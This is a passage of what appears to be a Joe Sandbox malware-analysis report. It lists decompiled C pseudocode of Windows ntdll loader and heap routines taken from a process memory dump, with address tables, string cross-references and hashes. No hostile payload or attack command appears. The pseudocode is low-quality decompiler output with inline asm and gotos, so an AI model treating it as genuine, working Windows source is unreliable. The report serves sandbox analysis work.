					__eflags =  *(_t161 + 0x40) & 0x10000000;
					if(( *(_t161 + 0x40) & 0x10000000) != 0) {
						goto L5;
					}
					_t127 = E34EFF85F(_t161);
					__eflags = _t127;
					if(_t127 == 0) {
						goto L30;
					}
					goto L5;
				} else {
					L5:
					if(_t161 ==  *((intOrPtr*)( *[fs:0x30] + 0x18))) {
						goto L30;
					} else {
						E34E5FED0(0x34f44800);
						E34E4FAEC(_t161);
						_push(0x34f44800);
						E34E5E740(_t161);
						_t86 = _t161 + 0x9c;
						_t131 =  *_t86;
						while(_t86 != _t131) {
							_t87 = _t131;
							_t158 =  &_v92;
							_t131 =  *_t131;
							_v92 = _t87 & 0xffff0000;
							_v96 = 0;
							E34E4FABA( &_v92,  &_v96, "true");
							_t91 = E34E63C40();
							__eflags = _t91;
							if(_t91 == 0) {
								_t92 = 0x7ffe0388;
							} else {
								_t92 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
							}
							__eflags =  *_t92;
							if( *_t92 != 0) {
								_t158 = _v92;
								L34F0DA30(_t131, _t161, _v92, _v96);
							}
							_t86 = _t161 + 0x9c;
						}
						if( *((char*)(_t161 + 0xea)) == 2) {
							_t96 =  *((intOrPtr*)(_t161 + 0xe4));
						} else {
							_t96 = 0;
						}
						if(_t96 != 0) {
							 *(_t176 + 0x1c) = _t96;
							_t158 = _t176 + 0x1c;
							_v88 = 0;
							E34E4FABA(_t176 + 0x1c,  &_v88, "true");
						}
						_t132 = _t161 + 0x88;
						if( *_t132 != 0) {
							 *((intOrPtr*)(_t176 + 0x24)) = 0;
							_t158 = _t132;
							E34E4FABA(_t132, _t176 + 0x24, "true");
							 *_t132 = 0;
						}
						if(( *(_t161 + 0x40) & 0x00000001) == 0) {
							 *((intOrPtr*)(_t161 + 0xc8)) = 0;
						}
						goto L16;
						L16:
						_t169 =  *((intOrPtr*)(_t161 + 0xa8)) - 0x10;
						L34E4FA44(_t169);
						if(_t169 != _t161) {
							goto L16;
						} else {
							_t102 = E34E63C40();
							_t170 = 0x7ffe0380;
							if(_t102 != 0) {
								_t105 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t105 = 0x7ffe0380;
							}
							if( *_t105 != 0) {
								_t106 =  *[fs:0x30];
								__eflags =  *(_t106 + 0x240) & 0x00000001;
								if(( *(_t106 + 0x240) & 0x00000001) != 0) {
									_t121 = E34E63C40();
									__eflags = _t121;
									if(_t121 != 0) {
										_t170 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags = _t170;
									}
									 *((short*)(_t176 + 0x2a)) = 0x1023;
									_push(_t176 + 0x24);
									_push(4);
									_push(0x402);
									_push( *_t170 & 0x000000ff);
									 *(_t176 + 0x54) = _t161;
									E34E92F90();
								}
							}
							_t107 = E34E63C40();
							_t171 = 0x7ffe038a;
							if(_t107 != 0) {
								_t110 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t110 = 0x7ffe038a;
							}
							if( *_t110 != 0) {
								_t111 = E34E63C40();
								__eflags = _t111;
								if(_t111 != 0) {
									_t171 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									__eflags = _t171;
								}
								 *((short*)(_t176 + 0x4e)) = 0x1023;
								_push(_t176 + 0x48);
								_push(4);
								_push(0x402);
								_push( *_t171 & 0x000000ff);
								_v8 = _t161;
								E34E92F90();
							}
							if(E34E63C40() != 0) {
								_t118 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
							} else {
								_t118 = 0x7ffe0388;
							}
							if( *_t118 != 0) {
								E34F0D9C6(_t161);
							}
							goto L26;
						}
					}
				}
			}

0x34e4f8b0
0x34e4f8b8
0x34e4f8c2
0x34e4f8c6
0x34e4f8c9
0x34e4f8ce
0x34eae467
0x34eae46e
0x34eae474
0x34eae47a
0x34eae47e
0x34eae49d
0x34eae4a2
0x34eae480
0x34eae495
0x34eae49a
0x34eae4a8
0x34eae4ad
0x34eae4b2
0x34eae4ba
0x34eae4c2
0x34eae4c3
0x34eae4c3
0x34eae4ba
0x34e4f9f6
0x34e4f9f6
0x34e4f9f8
0x34e4f9fc
0x34e4f9fd
0x34e4f9fe
0x34e4fa09
0x34e4fa09
0x34e4f8db
0x34eae4cd
0x34eae4d3
0x34eae4d6
0x34e4fa37
0x34e4fa37
0x00000000
0x34e4fa37
0x34eae4dc
0x34eae4e1
0x34eae4e3
0x34eae4e9
0x34eae4eb
0x34eae4eb
0x34eae4f2
0x34eae4f9
0x34eae504
0x34eae505
0x34eae50c
0x00000000
0x34eae50c
0x34e4f8e8
0x34eae516
0x34eae51f
0x34eae525
0x00000000
0x34eae525
0x34e4f8ee
0x34e4f8ee
0x34e4f8f5
0x34eae530
0x34eae532
0x34eae532
0x34e4f8fd
0x34e4f909
0x34eae53c
0x34eae543
0x00000000
0x00000000
0x34eae54b
0x34eae550
0x34eae552
0x00000000
0x00000000
0x00000000
0x34e4f90f
0x34e4f90f
0x34e4f918
0x00000000
0x34e4f91e
0x34e4f924
0x34e4f92b
0x34e4f930
0x34e4f931
0x34e4f936
0x34e4f93c
0x34e4f93e
0x34eae55d
0x34eae55f
0x34eae563
0x34eae56a
0x34eae578
0x34eae57c
0x34eae581
0x34eae586
0x34eae588
0x34eae59a
0x34eae58a
0x34eae593
0x34eae593
0x34eae59f
0x34eae5a2
0x34eae5a8
0x34eae5ae
0x34eae5ae
0x34eae5b3
0x34eae5b3
0x34e4f94d
0x34e4fa0c
0x34e4f953
0x34e4f953
0x34e4f953
0x34e4f957
0x34e4fa17
0x34e4fa1b
0x34e4fa28
0x34e4fa2d
0x34e4fa2d
0x34e4f95d
0x34e4f965
0x34eae5c7
0x34eae5cc
0x34eae5ce
0x34eae5d3
0x34eae5d3
0x34e4f96f
0x34e4f981
0x34e4f981
0x00000000
0x34e4f987
0x34e4f98d
0x34e4f992
0x34e4f999
0x00000000
0x34e4f99b
0x34e4f99b
0x34e4f9a0
0x34e4f9ac
0x34eae5e3
0x34e4f9b2
0x34e4f9b2
0x34e4f9b2
0x34e4f9b7
0x34eae5ea
0x34eae5f0
0x34eae5f7
0x34eae5fd
0x34eae602
0x34eae604
0x34eae60f
0x34eae60f
0x34eae60f
0x34eae618
0x34eae621
0x34eae622
0x34eae624
0x34eae62c
0x34eae62d
0x34eae631
0x34eae631
0x34eae5f7
0x34e4f9bd
0x34e4f9c2
0x34e4f9ce
0x34eae644
0x34e4f9d4
0x34e4f9d4
0x34e4f9d4
0x34e4f9d9
0x34eae64b
0x34eae650
0x34eae652
0x34eae65d
0x34eae65d
0x34eae65d
0x34eae666
0x34eae66f
0x34eae670
0x34eae672
0x34eae67a
0x34eae67b
0x34eae67f
0x34eae67f
0x34e4f9e6
0x34eae692
0x34e4f9ec
0x34e4f9ec
0x34e4f9ec
0x34e4f9f4
0x34e4fa3d
0x34e4fa3d
0x00000000
0x34e4f9f4
0x34e4f999
0x34e4f918

APIs

RtlDebugPrintTimes.NTDLL ref: 34EAE51F

Strings

HEAP: , xrefs: 34EAE49D
HEAP[%wZ]: , xrefs: 34EAE490
(HeapHandle != NULL), xrefs: 34EAE4A8

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: DebugPrintTimes
String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 3446177414-3610490719
Opcode ID: 3eaa4d83b2abe709fca0529880739e7243cc211b8287fc13d8e8b35e442553c5
Instruction ID: 06fb52bed221a12c376605a16706f8a08a83ce15050398dd93f77ffbf3625914
Opcode Fuzzy Hash: 3eaa4d83b2abe709fca0529880739e7243cc211b8287fc13d8e8b35e442553c5
Instruction Fuzzy Hash: 75910771B54751EFF315CFA8D840B2AB7A9FF84A48F040959E9419B381DF34E841CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 34E70AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210
timeCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E34E70AEB(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t67;
				signed int _t70;
				signed int _t76;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t84;
				intOrPtr _t89;
				signed int _t90;
				intOrPtr _t93;
				signed char _t101;
				intOrPtr _t104;
				void* _t108;
				void* _t111;
				signed int _t113;
				intOrPtr* _t117;
				signed int _t119;
				intOrPtr* _t120;
				signed int _t121;
				intOrPtr* _t122;
				signed int _t126;
				void* _t130;
				void* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t135;
				intOrPtr _t136;
				signed int _t137;
				signed int _t138;
				void* _t139;
				void* _t140;
				void* _t141;

				_t134 = 0;
				_t108 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t141 =  *0x34f468d8 - _t134; // 0x0
				if(_t141 != 0) {
					_v20 = 1;
				}
				if( *0x34f465f9 == 0) {
					_t136 =  *((intOrPtr*)(_t108 + 4));
					while(1) {
						__eflags = _t136 - _t108;
						if(_t136 == _t108) {
							break;
						}
						_t110 = _t136 - 0x54;
						E34E87550(_t136 - 0x54);
						_t136 =  *((intOrPtr*)(_t136 + 4));
					}
					goto L2;
				} else {
					L2:
					_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
					E34E5FED0(0x34f432d8);
					if( *0x34f465f0 != 0) {
						_t126 =  *0x7ffe0330;
						_t135 =  *0x34f49218; // 0x0
						_t111 = 0x20;
						_t110 = _t111 - (_t126 & 0x0000001f);
						asm("ror edi, cl");
						_t134 = _t135 ^ _t126;
					}
					_t137 = 0;
					_t67 =  *((intOrPtr*)(_t108 + 4));
					_v36 = 0;
					_v32 = _t67;
					if(_t67 == _t108) {
						L11:
						_push(0x34f432d8);
						E34E5E740(_t110);
						return _t137;
					} else {
						_t113 = _v16 & 0x00000100;
						_v16 = _t113;
						do {
							_t138 = _t67 - 0x54;
							if(_t113 != 0) {
								_t110 = _t138;
								_t70 = E34E46DA6(_t138);
								_v36 = _t70;
								__eflags = _t70;
								if(_t70 < 0) {
									break;
								}
							}
							_t114 = _t138;
							E34E598DE(_t138, 0);
							if(_t134 != 0) {
								__eflags =  *0x34f465f8;
								if(__eflags == 0) {
									_t114 = _t134;
									 *0x34f491e0(_t138);
									 *_t134();
									 *(_t138 + 0x35) =  *(_t138 + 0x35) | 0x00000008;
								}
							}
							_t148 = _v20;
							if(_v20 == 0) {
								_t76 =  *(_t138 + 0x28);
								_t114 = _t76;
								_t130 = 0x10;
								_v8 = _t76;
								if(E34E71C7D(_t76, _t130, _t148) != 0) {
									_t117 = _v8;
									_t31 = _t117 + 2; // 0x2
									_t131 = _t31;
									do {
										_t78 =  *_t117;
										_t117 = _t117 + 2;
										__eflags = _t78 - _v12;
									} while (_t78 != _v12);
									_t114 = _t117 - _t131 >> 1;
									__eflags =  *0x34f468d8;
									if( *0x34f468d8 == 0) {
										_t33 = _t114 + 2; // 0x0
										_t79 = _t33;
									} else {
										_t104 =  *0x34f45d4c; // 0x0
										_t79 = _t104 + 1 + _t114;
									}
									_v28 = _t79;
									_t132 = E34E65D90(_t114,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t79 + _t79);
									_v24 = _t132;
									__eflags = _t132;
									if(_t132 != 0) {
										_t119 =  *0x34f468d8; // 0x0
										__eflags = _t119;
										if(_t119 == 0) {
											_t120 = _v8;
											_t52 = _t120 + 2; // 0x2
											_v40 = _t52;
											do {
												_t84 =  *_t120;
												_t120 = _t120 + 2;
												__eflags = _t84 - _v12;
											} while (_t84 != _v12);
											_t121 = _t120 - _v40;
											__eflags = _t121;
											_t114 = _t121 >> 1;
											E34E988C0(_t132, _v8, (_t121 >> 1) + (_t121 >> 1));
											_t139 = _t139 + 0xc;
											L39:
											 *0x34f468d8 = _v24;
											 *0x34f45d4c = _v28;
											goto L9;
										}
										_t89 =  *0x34f45d4c; // 0x0
										_t90 = _t89 + _t89;
										__eflags = _t90;
										_v40 = _t90;
										E34E988C0(_t132, _t119, _t90);
										_t133 = _v8;
										_t140 = _t139 + 0xc;
										_t122 = _v8;
										_t43 = _t122 + 2; // 0x2
										_v8 = _t43;
										do {
											_t93 =  *_t122;
											_t122 = _t122 + 2;
											__eflags = _t93 - _v12;
										} while (_t93 != _v12);
										_t114 = _v40 + 2;
										E34E988C0(_v24 + _v40 + 2, _t133, (_t122 - _v8 >> 1) + (_t122 - _v8 >> 1));
										_t139 = _t140 + 0xc;
										L34E63BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *0x34f468d8);
										goto L39;
									} else {
										_t101 =  *0x34f437c0; // 0x0
										__eflags = _t101 & 0x00000003;
										if((_t101 & 0x00000003) != 0) {
											_push("Failed to allocated memory for shimmed module list\n");
											__eflags = 0;
											_push(0);
											_push("LdrpCheckModule");
											_push(0xaf4);
											_push("minkernel\\ntdll\\ldrinit.c");
											E34ECE692();
											_t101 =  *0x34f437c0; // 0x0
											_t139 = _t139 + 0x14;
										}
										__eflags = _t101 & 0x00000010;
										if((_t101 & 0x00000010) != 0) {
											asm("int3");
										}
										goto L9;
									}
								}
							}
							L9:
							E34E70C2C(_t138, 1, _t114);
							 *(_t138 + 0x34) =  *(_t138 + 0x34) | 0x00000008;
							E34E6DF36( *((intOrPtr*)(_t138 + 0x18)), _t138 + 0x24, 0x14ad);
							_t113 = _v16;
							_t67 =  *((intOrPtr*)(_v32 + 4));
							_v32 = _t67;
						} while (_t67 != _t108);
						_t137 = _v36;
						goto L11;
					}
				}
			}

0x34e70af6
0x34e70af8
0x34e70afa
0x34e70afd
0x34e70b00
0x34e70b06
0x34eb9ea5
0x34eb9ea5
0x34e70b13
0x34e70bd3
0x34e70be3
0x34e70be3
0x34e70be5
0x00000000
0x00000000
0x34e70bd8
0x34e70bdb
0x34e70be0
0x34e70be0
0x00000000
0x34e70b19
0x34e70b19
0x34e70b27
0x34e70b2a
0x34e70b36
0x34e70c0d
0x34e70c15
0x34e70c20
0x34e70c21
0x34e70c23
0x34e70c25
0x34e70c25
0x34e70b3e
0x34e70b40
0x34e70b43
0x34e70b46
0x34e70b4b
0x34e70bc2
0x34e70bc2
0x34e70bc7
0x34e70bd2
0x34e70b4d
0x34e70b50
0x34e70b56
0x34e70b59
0x34e70b59
0x34e70b5e
0x34eb9eb1
0x34eb9eb3
0x34eb9eb8
0x34eb9ebb
0x34eb9ebd
0x00000000
0x00000000
0x34eb9ec3
0x34e70b66
0x34e70b69
0x34e70b70
0x34e70bec
0x34e70bf3
0x34e70bfa
0x34e70bfc
0x34e70c02
0x34e70c04
0x34e70c04
0x34e70bf3
0x34e70b72
0x34e70b76
0x34e70b78
0x34e70b7b
0x34e70b7f
0x34e70b80
0x34e70b8a
0x34eb9ec8
0x34eb9ecb
0x34eb9ecb
0x34eb9ece
0x34eb9ece
0x34eb9ed1
0x34eb9ed4
0x34eb9ed4
0x34eb9edc
0x34eb9ede
0x34eb9ee5
0x34eb9ef1
0x34eb9ef1
0x34eb9ee7
0x34eb9ee7
0x34eb9eed
0x34eb9eed
0x34eb9ef4
0x34eb9f0a
0x34eb9f0c
0x34eb9f0f
0x34eb9f11
0x34eb9f4e
0x34eb9f54
0x34eb9f56
0x34eb9fbb
0x34eb9fbe
0x34eb9fc1
0x34eb9fc4
0x34eb9fc4
0x34eb9fc7
0x34eb9fca
0x34eb9fca
0x34eb9fd0
0x34eb9fd0
0x34eb9fd3
0x34eb9fdd
0x34eb9fe2
0x34eb9fe5
0x34eb9fe8
0x34eb9ff0
0x00000000
0x34eb9ff0
0x34eb9f58
0x34eb9f5d
0x34eb9f5d
0x34eb9f62
0x34eb9f65
0x34eb9f6a
0x34eb9f6d
0x34eb9f70
0x34eb9f72
0x34eb9f75
0x34eb9f78
0x34eb9f78
0x34eb9f7b
0x34eb9f7e
0x34eb9f7e
0x34eb9f93
0x34eb9f9a
0x34eb9f9f
0x34eb9fb4
0x00000000
0x34eb9f13
0x34eb9f13
0x34eb9f18
0x34eb9f1a
0x34eb9f1c
0x34eb9f21
0x34eb9f23
0x34eb9f24
0x34eb9f29
0x34eb9f2e
0x34eb9f33
0x34eb9f38
0x34eb9f3d
0x34eb9f3d
0x34eb9f40
0x34eb9f42
0x34eb9f48
0x34eb9f48
0x00000000
0x34eb9f42
0x34eb9f11
0x34e70b8a
0x34e70b90
0x34e70b96
0x34e70ba1
0x34e70baa
0x34e70bb2
0x34e70bb5
0x34e70bb8
0x34e70bbb
0x34e70bbf
0x00000000
0x34e70bbf
0x34e70b4b

APIs

RtlDebugPrintTimes.NTDLL ref: 34E70BFC

Strings

minkernel\ntdll\ldrinit.c, xrefs: 34EB9F2E
Failed to allocated memory for shimmed module list, xrefs: 34EB9F1C
LdrpCheckModule, xrefs: 34EB9F24

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-161242083
Opcode ID: 58e8b6206aeeab9e614aae6526f65d70f802b5871f6a4ebdaf8c83adce17b13a
Instruction ID: 1fb47f5b3ea0577552fd5d095d992060704becc1533e228cfa2fefb79c8b02f2
Opcode Fuzzy Hash: 58e8b6206aeeab9e614aae6526f65d70f802b5871f6a4ebdaf8c83adce17b13a
Instruction Fuzzy Hash: 05719C75A10205DFEB14DF68C880AAEBBF4EF44318F18446DE845E7750EB34EA42CB94

Uniqueness

Uniqueness Score: -1.00%

Function 34ED43D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121
timeCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E34ED43D5(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __esi;
				signed char _t37;
				signed int _t41;
				intOrPtr _t44;
				signed int _t49;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				void* _t54;
				signed int _t59;
				signed int _t60;
				signed int _t64;
				signed int _t66;
				intOrPtr _t68;
				signed int _t69;
				intOrPtr _t70;

				_t68 = _a4;
				_t54 = __edx;
				_v28 = __ecx;
				_v24 = L34ED4B46(_t68);
				_v12 =  *((intOrPtr*)(_t54 + 0x2c));
				_v8 =  *((intOrPtr*)(_t54 + 0x30));
				_v20 =  *((intOrPtr*)(_t54 + 0x90));
				_t37 =  *0x34f46714; // 0x0
				_v16 = _t68;
				_t69 =  *0x34f46710; // 0x0
				if((_t37 & 0x00000001) != 0) {
					if(_t69 == 0) {
						_t69 = 0;
						__eflags = 0;
					} else {
						_t69 = _t69 ^ 0x34f46710;
					}
				}
				_t64 = _t37 & 1;
				while(_t69 != 0) {
					__eflags = E34ED4528(_t54, _t69,  &_v24, _t69);
					if(__eflags >= 0) {
						if(__eflags <= 0) {
							L25:
							while(_t69 != 0) {
								_t41 = E34ED4528(_t54, _t69,  &_v24, _t69);
								__eflags = _t41;
								if(_t41 != 0) {
									break;
								}
								_t66 =  *0x34f45ca0; // 0x0
								__eflags = _t66;
								if(_t66 == 0) {
									L28:
									__eflags =  *0x34f437c0 & 0x00000005;
									_t70 =  *((intOrPtr*)(_t69 + 0x20));
									if(( *0x34f437c0 & 0x00000005) != 0) {
										_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
										_push( *((intOrPtr*)(_t44 + 0x2a8)));
										_push( *((intOrPtr*)(_t44 + 0x2a4)));
										_push(_a4);
										_push( *((intOrPtr*)(_t54 + 0x30)));
										_push( *((intOrPtr*)(_t54 + 0x2c)));
										_push( *((intOrPtr*)(_v28 + 0x30)));
										E34ECE692("minkernel\\ntdll\\ldrredirect.c", 0x12b, "LdrpCheckRedirection", 2, "Import Redirection: %wZ %wZ!%s redirected to %wZ\n",  *((intOrPtr*)(_v28 + 0x2c)));
									}
									L27:
									return _t70;
								}
								 *0x34f491e0( *((intOrPtr*)(_v28 + 0x28)),  *((intOrPtr*)(_t69 + 0x24)));
								_t49 =  *_t66();
								__eflags = _t49;
								if(_t49 != 0) {
									goto L28;
								}
								_t50 =  *(_t69 + 4);
								_t59 = _t69;
								__eflags = _t50;
								if(_t50 == 0) {
									while(1) {
										_t69 =  *(_t69 + 8) & 0xfffffffc;
										__eflags = _t69;
										if(_t69 == 0) {
											goto L25;
										}
										__eflags =  *_t69 - _t59;
										if( *_t69 == _t59) {
											goto L25;
										}
										_t59 = _t69;
									}
									continue;
								}
								_t69 = _t50;
								_t60 =  *_t69;
								__eflags = _t60;
								if(_t60 == 0) {
									continue;
								} else {
									goto L20;
								}
								do {
									L20:
									_t51 =  *_t60;
									_t69 = _t60;
									_t60 = _t51;
									__eflags = _t51;
								} while (_t51 != 0);
							}
							_t70 = 0xffbadd11;
							goto L27;
						}
						_t52 =  *(_t69 + 4);
						L9:
						__eflags = _t64;
						if(_t64 == 0) {
							L12:
							_t69 = _t52;
							continue;
						}
						__eflags = _t52;
						if(_t52 == 0) {
							goto L12;
						}
						_t69 = _t69 ^ _t52;
						continue;
					}
					_t52 =  *_t69;
					goto L9;
				}
				goto L25;
			}

0x34ed43e2
0x34ed43e5
0x34ed43e7
0x34ed43f3
0x34ed43fa
0x34ed4401
0x34ed440b
0x34ed440f
0x34ed4414
0x34ed4418
0x34ed4420
0x34ed4424
0x34ed442e
0x34ed442e
0x34ed4426
0x34ed4426
0x34ed4426
0x34ed4424
0x34ed4433
0x34ed445e
0x34ed4443
0x34ed4445
0x34ed444b
0x00000000
0x34ed44c0
0x34ed446a
0x34ed446f
0x34ed4471
0x00000000
0x00000000
0x34ed4473
0x34ed4479
0x34ed447b
0x34ed44d4
0x34ed44d4
0x34ed44db
0x34ed44de
0x34ed44e6
0x34ed44e9
0x34ed44ef
0x34ed44f9
0x34ed44fc
0x34ed44ff
0x34ed4502
0x34ed451e
0x34ed4523
0x34ed44c9
0x34ed44d1
0x34ed44d1
0x34ed4489
0x34ed448f
0x34ed4491
0x34ed4493
0x00000000
0x00000000
0x34ed4495
0x34ed4498
0x34ed449a
0x34ed449c
0x34ed44b8
0x34ed44bb
0x34ed44bb
0x34ed44be
0x00000000
0x00000000
0x34ed44b2
0x34ed44b4
0x00000000
0x00000000
0x34ed44b6
0x34ed44b6
0x00000000
0x34ed44b8
0x34ed449e
0x34ed44a0
0x34ed44a2
0x34ed44a4
0x00000000
0x00000000
0x00000000
0x00000000
0x34ed44a6
0x34ed44a6
0x34ed44a6
0x34ed44a8
0x34ed44aa
0x34ed44ac
0x34ed44ac
0x34ed44b0
0x34ed44c4
0x00000000
0x34ed44c4
0x34ed444d
0x34ed4450
0x34ed4450
0x34ed4452
0x34ed445c
0x34ed445c
0x00000000
0x34ed445c
0x34ed4454
0x34ed4456
0x00000000
0x00000000
0x34ed4458
0x00000000
0x34ed4458
0x34ed4447
0x00000000
0x34ed4447
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 34ED4489

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 34ED4508
LdrpCheckRedirection, xrefs: 34ED450F
minkernel\ntdll\ldrredirect.c, xrefs: 34ED4519

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 3446177414-3154609507
Opcode ID: bb28a1db6635085abbace8dd436399ce4132a18ee0eccca8b80c27704c0dc84c
Instruction ID: 4a4357517abc5673110eae543ab5a192fa153ffb4deb14c8365b853cc0a66ac8
Opcode Fuzzy Hash: bb28a1db6635085abbace8dd436399ce4132a18ee0eccca8b80c27704c0dc84c
Instruction Fuzzy Hash: E241D0776043119FDB10CF68D940A16F7E8EF6A65CF09069DEC98E7355DB31D8828B81

Uniqueness

Uniqueness Score: -1.00%

Function 34E7EE48 Relevance: 6.3, APIs: 4, Instructions: 347
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E34E7EE48(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t196;
				signed int _t201;
				signed int _t202;
				intOrPtr _t206;
				signed int _t207;
				intOrPtr _t209;
				intOrPtr _t215;
				signed int _t222;
				signed int _t227;
				signed int _t228;
				signed int _t231;
				signed int _t244;
				signed int _t247;
				char* _t250;
				intOrPtr _t255;
				signed int _t269;
				signed int* _t270;
				intOrPtr _t279;
				signed char _t284;
				signed int _t291;
				signed int _t292;
				intOrPtr _t301;
				intOrPtr* _t307;
				signed int _t308;
				signed int _t309;
				intOrPtr _t313;
				intOrPtr _t314;
				intOrPtr* _t316;
				void* _t318;

				_push(0x7c);
				_push(0x34f2c610);
				E34EA7C40(__ebx, __edi, __esi);
				_t313 = __edx;
				 *((intOrPtr*)(_t318 - 0x48)) = __edx;
				 *((intOrPtr*)(_t318 - 0x20)) = __ecx;
				 *(_t318 - 0x58) = 0;
				 *((intOrPtr*)(_t318 - 0x74)) = 0;
				_t269 = 0;
				 *(_t318 - 0x64) = 0;
				 *((intOrPtr*)(_t318 - 0x70)) =  *((intOrPtr*)(__ecx + 0x2c)) + __ecx;
				_t196 = __edx + 0x28;
				 *((intOrPtr*)(_t318 - 0x78)) = _t196;
				 *((intOrPtr*)(_t318 - 0x84)) = _t196;
				L34E62330(_t196, _t196);
				_t314 =  *((intOrPtr*)(_t313 + 0x2c));
				 *((intOrPtr*)(_t318 - 0x68)) = _t314;
				L1:
				while(1) {
					if(_t314 ==  *((intOrPtr*)(_t318 - 0x48)) + 0x2c) {
						E34E624D0( *((intOrPtr*)(_t318 - 0x78)));
						asm("sbb ebx, ebx");
						 *[fs:0x0] =  *((intOrPtr*)(_t318 - 0x10));
						return  ~_t269 & 0xc000022d;
					}
					 *((intOrPtr*)(_t318 - 0x54)) = _t314 - 4;
					_t307 = 0x7ffe0010;
					_t270 = 0x7ffe03b0;
					goto L4;
					do {
						do {
							do {
								do {
									L4:
									_t201 =  *0x34f467f0; // 0x0
									 *(_t318 - 0x30) = _t201;
									_t202 =  *0x34f467f4; // 0x0
									 *(_t318 - 0x3c) = _t202;
									 *(_t318 - 0x28) =  *_t270;
									 *(_t318 - 0x5c) = _t270[1];
									while(1) {
										_t301 =  *0x7ffe000c;
										_t279 =  *0x7ffe0008;
										__eflags = _t301 -  *_t307;
										if(_t301 ==  *_t307) {
											goto L6;
										}
										asm("pause");
									}
									L6:
									_t270 = 0x7ffe03b0;
									_t308 =  *0x7ffe03b0;
									 *(_t318 - 0x38) = _t308;
									_t206 =  *0x7FFE03B4;
									 *((intOrPtr*)(_t318 - 0x34)) = _t206;
									__eflags =  *(_t318 - 0x28) - _t308;
									_t307 = 0x7ffe0010;
								} while ( *(_t318 - 0x28) != _t308);
								__eflags =  *(_t318 - 0x5c) - _t206;
							} while ( *(_t318 - 0x5c) != _t206);
							_t207 =  *0x34f467f0; // 0x0
							_t309 =  *0x34f467f4; // 0x0
							 *(_t318 - 0x28) = _t309;
							__eflags =  *(_t318 - 0x30) - _t207;
							_t307 = 0x7ffe0010;
						} while ( *(_t318 - 0x30) != _t207);
						__eflags =  *(_t318 - 0x3c) -  *(_t318 - 0x28);
					} while ( *(_t318 - 0x3c) !=  *(_t318 - 0x28));
					_t316 =  *((intOrPtr*)(_t318 - 0x68));
					_t269 =  *(_t318 - 0x64);
					asm("sbb edx, [ebp-0x34]");
					asm("sbb edx, eax");
					 *(_t318 - 0x28) = _t279 -  *(_t318 - 0x38) -  *(_t318 - 0x30) + 0x7a120;
					asm("adc edx, edi");
					asm("lock inc dword [esi+0x28]");
					_t209 =  *((intOrPtr*)(_t318 - 0x20));
					_t40 = _t209 + 0x18; // 0x4c20878
					_t284 =  *(_t316 + 0x20) &  *_t40;
					 *(_t318 - 0x38) = _t284;
					__eflags =  *(_t316 + 0x30);
					if( *(_t316 + 0x30) != 0) {
						L37:
						_t314 =  *_t316;
						 *((intOrPtr*)(_t318 - 0x68)) = _t314;
						E34E7F24A(_t318 - 0x74, _t269,  *((intOrPtr*)(_t318 - 0x54)), _t318 - 0x58, 0, _t314, _t318 - 0x74);
						__eflags =  *(_t318 - 0x58);
						if( *(_t318 - 0x58) != 0) {
							 *0x34f491e0( *((intOrPtr*)(_t318 - 0x74)));
							 *(_t318 - 0x58)();
						}
						continue;
					}
					__eflags = _t284;
					if(_t284 == 0) {
						goto L37;
					}
